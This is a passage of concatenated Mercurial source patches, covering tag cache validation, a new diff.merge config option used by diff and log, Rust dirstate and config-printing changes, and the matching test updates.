extdiff` now support `--from <rev>` and `--to <rev>` arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been deprecated. diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -776,58 +776,66 @@ #[cfg(not(feature = "dirstate-tree"))] #[timed] pub fn extend_from_dmap(&self, results: &mut Vec<DispatchedPath<'a>>) { - results.par_extend(self.dmap.par_iter().map( - move |(filename, entry)| { - let filename: &HgPath = filename; - let filename_as_path = match hg_path_to_path_buf(filename) { - Ok(f) => f, - Err(_) => { - return ( + results.par_extend( + self.dmap + .par_iter() + .filter(|(path, _)| self.matcher.matches(path)) + .map(move |(filename, entry)| { + let filename: &HgPath = filename; + let filename_as_path = match hg_path_to_path_buf(filename) + { + Ok(f) => f, + Err(_) => { + return ( + Cow::Borrowed(filename), + INVALID_PATH_DISPATCH, + ) + } + }; + let meta = self + .root_dir + .join(filename_as_path) + .symlink_metadata(); + match meta { + Ok(m) + if !(m.file_type().is_file() + || m.file_type().is_symlink()) => + { + ( + Cow::Borrowed(filename), + dispatch_missing(entry.state), + ) + } + Ok(m) => ( Cow::Borrowed(filename), - INVALID_PATH_DISPATCH, - ) - } - }; - let meta = - self.root_dir.join(filename_as_path).symlink_metadata(); - match meta { - Ok(m) - if !(m.file_type().is_file() - || m.file_type().is_symlink()) => - { - ( - Cow::Borrowed(filename), - dispatch_missing(entry.state), - ) + dispatch_found( + filename, + *entry, + HgMetadata::from_metadata(m), + &self.dmap.copy_map, + self.options, + ), + ), + Err(e) + if e.kind() == ErrorKind::NotFound + || e.raw_os_error() == Some(20) => + { + // Rust does not yet have an `ErrorKind` for + // `NotADirectory` (errno 20) + // It happens if the dirstate contains `foo/bar` + // and foo is not a + // directory + ( + Cow::Borrowed(filename), + dispatch_missing(entry.state), + ) + } + Err(e) => { + (Cow::Borrowed(filename), dispatch_os_error(&e)) + } } - Ok(m) => ( - Cow::Borrowed(filename), - dispatch_found( - filename, - *entry, - HgMetadata::from_metadata(m), - &self.dmap.copy_map, - self.options, - ), - ), - Err(e) - if e.kind() == ErrorKind::NotFound - || e.raw_os_error() == Some(20) => - { - // Rust does not yet have an `ErrorKind` for - // `NotADirectory` (errno 20) - // It happens if the dirstate contains `foo/bar` - // and foo is not a - // directory - ( - Cow::Borrowed(filename), - dispatch_missing(entry.state), - ) - } - Err(e) => (Cow::Borrowed(filename), dispatch_os_error(&e)), - } - }, - )); + }), + ); } /// Checks all files that are in the dirstate but were not found during the diff --git a/tests/test-hgweb-diffs.t b/tests/test-hgweb-diffs.t --- a/tests/test-hgweb-diffs.t +++ b/tests/test-hgweb-diffs.t @@ -1138,6 +1138,21 @@ $ cd test1 $ hg import -q --bypass --exact http://localhost:$HGPORT/rev/1 +repeat test above, with largefiles enabled + + $ cd .. + $ rm -r test1 + $ hg clone -r0 test test1 + adding changesets + adding manifests + adding file changes + added 1 changesets with 2 changes to 2 files + new changesets 0cd96de13884 + updating to branch default + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ cd test1 + $ hg import --config extensions.largefiles= -q --bypass --exact http://localhost:$HGPORT/rev/1 + raw revision with diff block numbers $ killdaemons.py diff --git a/tests/test-hook.t b/tests/test-hook.t --- a/tests/test-hook.t +++ b/tests/test-hook.t @@ -1390,3 +1390,42 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: a + +unsetup the test +---------------- + +# touch the file to unconfuse chg with a diffrent mtime + $ sleep 1 + $ touch $TESTTMP/untrusted.py + $ cat << EOF >> $HGRCPATH + > [extensions] + > untrusted=! + > EOF + +HGPLAIN setting in hooks +======================== + + $ cat << EOF >> .hg/hgrc + > [hooks] + > pre-version.testing-default=echo '### default ###' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-yes=echo '### yes #######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-yes:run-with-plain=yes + > pre-version.testing-no=echo '### no ########' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-no:run-with-plain=no + > pre-version.testing-auto=echo '### auto ######' plain: \${HGPLAIN:-'<unset>'} + > pre-version.testing-auto:run-with-plain=auto + > EOF + + $ (unset HGPLAIN; hg version --quiet) + ### default ### plain: 1 + ### yes ####### plain: 1 + ### no ######## plain: <unset> + ### auto ###### plain: <unset> + Mercurial Distributed SCM (*) (glob) + + $ HGPLAIN=1 hg version --quiet + ### default ### plain: 1 + ### yes ####### plain: 1 + ### no ######## plain: <unset> + ### auto ###### plain: 1 + Mercurial Distributed SCM (*) (glob) diff --git a/tests/test-status.t b/tests/test-status.t --- a/tests/test-status.t +++ b/tests/test-status.t @@ -680,3 +680,14 @@ $ cd symlink-repo0 $ ln -s ../repo0/.hg $ hg status + +Check using include flag with pattern when status does not need to traverse +the working directory (issue6483) + + $ cd .. + $ hg init issue6483 + $ cd issue6483 + $ touch a.py b.rs + $ hg add a.py b.rs + $ hg st -aI "*.py" + A a.py # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1608826883 18000 # Thu Dec 24 11:21:23 2020 -0500 # Node ID 5aac1a1a5bebf3dc9cae86d1f50dc019a7481f7f # Parent d67732a4b58a3f11e2d4f2e2aa85d759738a6dff tagcache: distinguish between invalid and missing entries The TortoiseHg repo has typically not had a newly applied tag accessible by name for recent releases, for unknown reasons. Deleting and rebuilding the tag cache doesn't fix it, though deleting the cache and running `hg log -r $new_tag` does. Eventually the situation does sort itself out for new clones from the server. In an effort to figure out what the issue is, Pierre-Yves David suggested listing these entries in the debug output more specifically. This isn't complete yet- the second test change that says "missing" is more like "invalid", since it was truncated. The problem there is the code that reads the raw array truncates any partial records and then fills it with 0xFF, which signifies that it is missing. As a side note, that means the check for the length when validating an existing entry never fails. Differential Revision: https://phab.mercurial-scm.org/D9811 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -1769,7 +1769,7 @@ for node in outgoing.ancestorsof: # Don't compute missing, as this may slow down serving. fnode = cache.getfnode(node, computemissing=False) - if fnode is not None: + if fnode: chunks.extend([node, fnode]) if chunks: diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3868,7 +3868,13 @@ for r in repo: node = repo[r].node() tagsnode = cache.getfnode(node, computemissing=False) - tagsnodedisplay = hex(tagsnode) if tagsnode else b'missing/invalid' + if tagsnode: + tagsnodedisplay = hex(tagsnode) + elif tagsnode is False: + tagsnodedisplay = b'invalid' + else: + tagsnodedisplay = b'missing' + ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay)) diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -733,6 +733,7 @@ if rawlen < wantedlen: if self._dirtyoffset is None: self._dirtyoffset = rawlen + # TODO: zero fill entire record, because it's invalid not missing? self._raw.extend(b'\xff' * (wantedlen - rawlen)) def getfnode(self, node, computemissing=True): @@ -740,7 +741,8 @@ If the value is in the cache, the entry will be validated and returned. Otherwise, the filenode will be computed and returned unless - "computemissing" is False, in which case None will be returned without + "computemissing" is False. In that case, None will be returned if + the entry is missing or False if the entry is invalid without any potentially expensive computation being performed. If an .hgtags does not exist at the specified revision, nullid is @@ -771,6 +773,8 @@ # If we get here, the entry is either missing or invalid. if not computemissing: + if record != _fnodesmissingrec: + return False return None fnode = None @@ -788,7 +792,7 @@ # we cannot rely on readfast because we don't know against what # parent the readfast delta is computed p1fnode = None - if p1fnode is not None: + if p1fnode: mctx = ctx.manifestctx() fnode = mctx.readfast().get(b'.hgtags') if fnode is None: diff --git a/tests/test-tags.t b/tests/test-tags.t --- a/tests/test-tags.t +++ b/tests/test-tags.t @@ -104,7 +104,7 @@ 0010: ff ff ff ff ff ff ff ff b9 15 46 36 26 b7 b4 a7 |..........F6&...| 0020: 73 e0 9e e3 c5 2f 51 0e 19 e0 5e 1f f9 66 d8 59 |s..../Q...^..f.Y| $ hg debugtagscache - 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing/invalid + 0 acb14030fe0a21b60322c440ad2d20cf7685a376 missing 1 b9154636be938d3d431e75a7c906504a079bfe07 26b7b4a773e09ee3c52f510e19e05e1ff966d859 Repeat with cold tag cache: @@ -381,7 +381,7 @@ $ hg debugtagscache | tail -2 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d - 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing/invalid + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 missing $ hg tags tip 5:8dbfe60eff30 bar 1:78391a272241 @@ -389,6 +389,34 @@ 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 0c04f2a8af31de17fab7422878ee5a2dadbc943d +If the 4 bytes of node hash for a record don't match an existing node, the entry +is flagged as invalid. + + >>> import os + >>> with open(".hg/cache/hgtagsfnodes1", "rb+") as fp: + ... fp.seek(-24, os.SEEK_END) and None + ... fp.write(b'\xde\xad') and None + + $ f --size --hexdump .hg/cache/hgtagsfnodes1 + .hg/cache/hgtagsfnodes1: size=144 + 0000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| + 0030: 7a 94 12 77 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |z..w.....1....B(| + 0040: 78 ee 5a 2d ad bc 94 3d 6f a4 50 21 7d 3b 71 8c |x.Z-...=o.P!};q.| + 0050: 96 4e f3 7b 89 e5 50 eb da fd 57 89 e7 6c e1 b0 |.N.{..P...W..l..| + 0060: 0c 19 2d 7d 0c 04 f2 a8 af 31 de 17 fa b7 42 28 |..-}.....1....B(| + 0070: 78 ee 5a 2d ad bc 94 3d de ad e6 0e 0c 04 f2 a8 |x.Z-...=........| + 0080: af 31 de 17 fa b7 42 28 78 ee 5a 2d ad bc 94 3d |.1....B(x.Z-...=| + + $ hg debugtagscache | tail -2 + 4 0c192d7d5e6b78a714de54a2e9627952a877e25a 0c04f2a8af31de17fab7422878ee5a2dadbc943d + 5 8dbfe60eff306a54259cfe007db9e330e7ecf866 invalid + + $ hg tags + tip 5:8dbfe60eff30 + bar 1:78391a272241 + #if unix-permissions no-root Errors writing to .hgtags fnodes cache are silently ignored @@ -405,7 +433,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> couldn't write cache/hgtagsfnodes1: [Errno *] * (glob) - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) + 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 @@ -420,7 +448,7 @@ $ hg blackbox -l 6 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing 24 bytes to cache/hgtagsfnodes1 - 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 3/4 cache hits/lookups in * seconds (glob) + 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> 2/4 cache hits/lookups in * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> writing .hg/cache/tags2-visible with 1 tags 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> tags exited 0 after * seconds (glob) 1970/01/01 00:00:00 bob @b968051b5cf3f624b771779c6d5f84f1d4c3fb5d (5000)> blackbox -l 6 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612472751 28800 # Thu Feb 04 13:05:51 2021 -0800 # Node ID d57e607d9e3359d3471763e92f29e32f001e2465 # Parent 5aac1a1a5bebf3dc9cae86d1f50dc019a7481f7f diff: replace --merge option by config option I can't think of any reason you'd want to enable the merge diff on a run-to-run basis; you'd probably either always or never want it set (though I can't see why you'd never want it set). If you have it set, you'll probably also want the same output in `hg log -p` output. Having a single config option for the feature makes sense. Differential Revision: https://phab.mercurial-scm.org/D9956 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -2465,16 +2465,6 @@ (b'', b'from', b'', _(b'revision to diff from'), _(b'REV1')), (b'', b'to', b'', _(b'revision to diff to'), _(b'REV2')), (b'c', b'change', b'', _(b'change made by revision'), _(b'REV')), - ( - b'', - b'merge', - False, - _( - b'show difference between auto-merge and committed ' - b'merge for merge commits (EXPERIMENTAL)' - ), - _(b'REV'), - ), ] + diffopts + diffopts2 @@ -2555,7 +2545,7 @@ to_rev = opts.get(b'to') stat = opts.get(b'stat') reverse = opts.get(b'reverse') - diffmerge = opts.get(b'merge') + diffmerge = ui.configbool(b'diff', b'merge') cmdutil.check_incompatible_arguments(opts, b'from', [b'rev', b'change']) cmdutil.check_incompatible_arguments(opts, b'to', [b'rev', b'change']) diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -754,6 +754,12 @@ ) _registerdiffopts(section=b'diff') coreconfigitem( + b'diff', + b'merge', + default=False, + experimental=True, +) +coreconfigitem( b'email', b'bcc', default=None, diff --git a/mercurial/filemerge.py b/mercurial/filemerge.py --- a/mercurial/filemerge.py +++ b/mercurial/filemerge.py @@ -546,7 +546,7 @@ def _imerge3alwaysgood(*args, **kwargs): # Like merge3, but record conflicts as resolved with markers in place. # - # This is used for `hg diff --merge` to show the differences between + # This is used for `diff.merge` to show the differences between # the auto-merge state and the committed merge state. It may be # useful for other things. b1, junk, b2 = _imerge3(*args, **kwargs) diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -8,10 +8,10 @@ == New Experimental Features == - * `hg diff` now takes an experimental `--merge` flag which causes `hg - diff --change` to show the changes relative to an automerge for - merge changesets. This makes it easier to detect and review manual - changes performed in merge changesets. + * There's a new `diff.merge` config option to show the changes + relative to an automerge for merge changesets. This makes it + easier to detect and review manual changes performed in merge + changesets. It is only supported by `hg diff --change` so far. == Bug Fixes == diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -336,7 +336,7 @@ debugwhyunstable: debugwireargs: three, four, five, ssh, remotecmd, insecure debugwireproto: localssh, peer, noreadstderr, nologhandshake, ssh, remotecmd, insecure - diff: rev, from, to, change, merge, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos + diff: rev, from, to, change, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos export: bookmark, output, switch-parent, rev, text, git, binary, nodates, template files: rev, print0, include, exclude, template, subrepos forget: interactive, include, exclude, dry-run diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -196,7 +196,7 @@ merge diff should show only manual edits to a merge: - $ hg diff --merge -c 6 + $ hg diff --config diff.merge=yes -c 6 (no diff output is expected here) Construct an "evil merge" that does something other than just the merge. @@ -226,7 +226,7 @@ Contrast with the `hg diff -c 7` version above: only the manual edit shows up, making it easy to identify changes someone is otherwise trying to sneak into a merge. - $ hg diff --merge -c 7 + $ hg diff --config diff.merge=yes -c 7 diff -r 8ad85e839ba7 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 @@ -266,15 +266,15 @@ $ hg resolve -ma (no more unresolved files) $ hg commit -m 'merge conflicted edit' -Without --merge, it's a diff against p1 - $ hg diff --no-merge -c 11 +Without diff.merge, it's a diff against p1 + $ hg diff --config diff.merge=no -c 11 diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000 @@ -0,0 +1,1 @@ +this file is new in p2 of the merge -With --merge, it's a diff against the conflicted content. - $ hg diff --merge -c 11 +With diff.merge, it's a diff against the conflicted content. + $ hg diff --config diff.merge=yes -c 11 diff -r 5010caab09f6 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612473661 28800 # Thu Feb 04 13:21:01 2021 -0800 # Node ID 4a012e53106656e327e696aabf0a97ff70bd13ab # Parent d57e607d9e3359d3471763e92f29e32f001e2465 diff: extract function for getting possibly re-merged parent to diff against We'll want to reuse the logic that `hg diff --change` with `diff.merge` uses. At least `hg log -p` should reuse it. This patch therefore extracts that code to a function. Differential Revision: https://phab.mercurial-scm.org/D9957 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -29,7 +29,6 @@ bundlecaches, changegroup, cmdutil, - context as contextmod, copies, debugcommands as debugcommandsmod, destutil, @@ -2545,33 +2544,13 @@ to_rev = opts.get(b'to') stat = opts.get(b'stat') reverse = opts.get(b'reverse') - diffmerge = ui.configbool(b'diff', b'merge') cmdutil.check_incompatible_arguments(opts, b'from', [b'rev', b'change']) cmdutil.check_incompatible_arguments(opts, b'to', [b'rev', b'change']) if change: repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn') ctx2 = scmutil.revsingle(repo, change, None) - if diffmerge and ctx2.p2().node() != nullid: - pctx1 = ctx2.p1() - pctx2 = ctx2.p2() - wctx = contextmod.overlayworkingctx(repo) - wctx.setbase(pctx1) - with ui.configoverride( - { - ( - b'ui', - b'forcemerge', - ): b'internal:merge3-lie-about-conflicts', - }, - b'diff --merge', - ): - repo.ui.pushbuffer() - mergemod.merge(pctx2, wc=wctx) - repo.ui.popbuffer() - ctx1 = wctx - else: - ctx1 = ctx2.p1() + ctx1 = logcmdutil.diff_parent(ctx2) elif from_rev or to_rev: repo = scmutil.unhidehashlikerevs( repo, [from_rev] + [to_rev], b'nowarn' diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -27,6 +27,7 @@ graphmod, match as matchmod, mdiff, + merge, patch, pathutil, pycompat, @@ -73,6 +74,36 @@ return limit +def diff_parent(ctx): + """get the context object to use as parent when diffing + + + If diff.merge is enabled, an overlayworkingctx of the auto-merged parents will be returned. + """ + repo = ctx.repo() + if repo.ui.configbool(b"diff", b"merge") and ctx.p2().node() != nullid: + # avoid cycle context -> subrepo -> cmdutil -> logcmdutil + from . import context + + wctx = context.overlayworkingctx(repo) + wctx.setbase(ctx.p1()) + with repo.ui.configoverride( + { + ( + b"ui", + b"forcemerge", + ): b"internal:merge3-lie-about-conflicts", + }, + b"merge-diff", + ): + repo.ui.pushbuffer() + merge.merge(ctx.p2(), wc=wctx) + repo.ui.popbuffer() + return wctx + else: + return ctx.p1() + + def diffordiffstat( ui, repo, # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612474331 28800 # Thu Feb 04 13:32:11 2021 -0800 # Node ID 3caa3698335edebeb5b423eb896e298e01b9abdb # Parent 4a012e53106656e327e696aabf0a97ff70bd13ab log: respect diff.merge in -p output Differential Revision: https://phab.mercurial-scm.org/D9958 diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -247,7 +247,7 @@ ui, ctx.repo(), diffopts, - ctx.p1(), + diff_parent(ctx), ctx, match=self._makefilematcher(ctx), stat=stat, diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -11,7 +11,8 @@ * There's a new `diff.merge` config option to show the changes relative to an automerge for merge changesets. This makes it easier to detect and review manual changes performed in merge - changesets. It is only supported by `hg diff --change` so far. + changesets. It is supported by `hg diff --change`, `hg log -p` + `hg incoming -p`, and `hg outgoing -p` so far. == Bug Fixes == diff --git a/tests/test-log.t b/tests/test-log.t --- a/tests/test-log.t +++ b/tests/test-log.t @@ -1966,6 +1966,26 @@ @@ -0,0 +1,1 @@ +b + +Test that diff.merge is respected (file b was added on one side and +and therefore merged cleanly) + + $ hg log -pr 3 --config diff.merge=yes + changeset: 3:8e07aafe1edc + tag: tip + parent: 2:b09be438c43a + parent: 1:925d80f479bb + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: 3 + + diff -r 8e07aafe1edc a + --- a/a Thu Jan 01 00:00:00 1970 +0000 + +++ b/a Thu Jan 01 00:00:00 1970 +0000 + @@ -1,1 +1,1 @@ + -b + +c + $ cd .. 'hg log -r rev fn' when last(filelog(fn)) != rev # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612779236 -3600 # Mon Feb 08 11:13:56 2021 +0100 # Node ID eace48b4a78655502a91bcf7d6f3bdeb50fd8d6e # Parent 3caa3698335edebeb5b423eb896e298e01b9abdb rust: Use the DisplayBytes trait in config printing This is similar to `std::fmt::Display`, but for arbitrary bytes instead of Unicode. Writing to an abstract output stream helps avoid allocating intermediate `Vec<u8>` buffers. Differential Revision: https://phab.mercurial-scm.org/D9966 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -244,16 +244,16 @@ [[package]] name = "format-bytes" -version = "0.1.3" +version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" dependencies = [ - "format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", ] [[package]] name = "format-bytes-macros" -version = "0.1.2" +version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" dependencies = [ "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", @@ -305,7 +305,7 @@ "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", "home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", @@ -718,7 +718,7 @@ "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", "hg-core 0.1.0", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", @@ -965,8 +965,8 @@ "checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" "checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" "checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" -"checksum format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)" = "1a7374eb574cd29ae45878554298091c554c3286a17b3afa440a3e2710ae0790" -"checksum format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "4edcc04201cea17a0e6b937adebd46b93fba09924c7e6ed8c515a35ce8432cbc" +"checksum format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" +"checksum format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" "checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" "checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" "checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -29,7 +29,7 @@ memmap = "0.7.0" zstd = "0.5.3" rust-crypto = "0.2.36" -format-bytes = "0.1.2" +format-bytes = "0.2.0" # We don't use the `miniz-oxide` backend to not change rhg benchmarks and until # we have a clearer view of which backend is the fastest. diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -12,6 +12,7 @@ ConfigError, ConfigLayer, ConfigParseError, ConfigValue, }; use crate::utils::files::get_bytes_from_path; +use format_bytes::{write_bytes, DisplayBytes}; use std::env; use std::path::{Path, PathBuf}; @@ -23,13 +24,22 @@ layers: Vec<layer::ConfigLayer>, } -impl std::fmt::Debug for Config { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for Config { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { for (index, layer) in self.layers.iter().rev().enumerate() { - write!( - f, - "==== Layer {} (trusted: {}) ====\n{:?}", - index, layer.trusted, layer + write_bytes!( + out, + b"==== Layer {} (trusted: {}) ====\n{}", + index, + if layer.trusted { + &b"yes"[..] + } else { + &b"no"[..] + }, + layer )?; } Ok(()) diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -9,7 +9,7 @@ use crate::errors::{HgError, IoResultExt}; use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; -use format_bytes::format_bytes; +use format_bytes::{write_bytes, DisplayBytes}; use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; @@ -165,8 +165,11 @@ } } -impl std::fmt::Debug for ConfigLayer { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { +impl DisplayBytes for ConfigLayer { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { let mut sections: Vec<_> = self.sections.iter().collect(); sections.sort_by(|e0, e1| e0.0.cmp(e1.0)); @@ -175,16 +178,13 @@ items.sort_by(|e0, e1| e0.0.cmp(e1.0)); for (item, config_entry) in items { - writeln!( - f, - "{}", - String::from_utf8_lossy(&format_bytes!( - b"{}.{}={} # {}", - section, - item, - &config_entry.bytes, - &self.origin.to_bytes(), - )) + write_bytes!( + out, + b"{}.{}={} # {}\n", + section, + item, + &config_entry.bytes, + &self.origin, )? } } @@ -224,13 +224,15 @@ * Others? */ } -impl ConfigOrigin { - /// TODO use some kind of dedicated trait? - pub fn to_bytes(&self) -> Vec<u8> { +impl DisplayBytes for ConfigOrigin { + fn display_bytes( + &self, + out: &mut dyn std::io::Write, + ) -> std::io::Result<()> { match self { - ConfigOrigin::File(p) => get_bytes_from_path(p), - ConfigOrigin::CommandLine => b"--config".to_vec(), - ConfigOrigin::Environment(e) => format_bytes!(b"${}", e), + ConfigOrigin::File(p) => out.write_all(&get_bytes_from_path(p)), + ConfigOrigin::CommandLine => out.write_all(b"--config"), + ConfigOrigin::Environment(e) => write_bytes!(out, b"${}", e), } } } diff --git a/rust/rhg/Cargo.toml b/rust/rhg/Cargo.toml --- a/rust/rhg/Cargo.toml +++ b/rust/rhg/Cargo.toml @@ -14,4 +14,4 @@ log = "0.4.11" micro-timer = "0.3.1" env_logger = "0.7.1" -format-bytes = "0.1.3" +format-bytes = "0.2.0" diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ 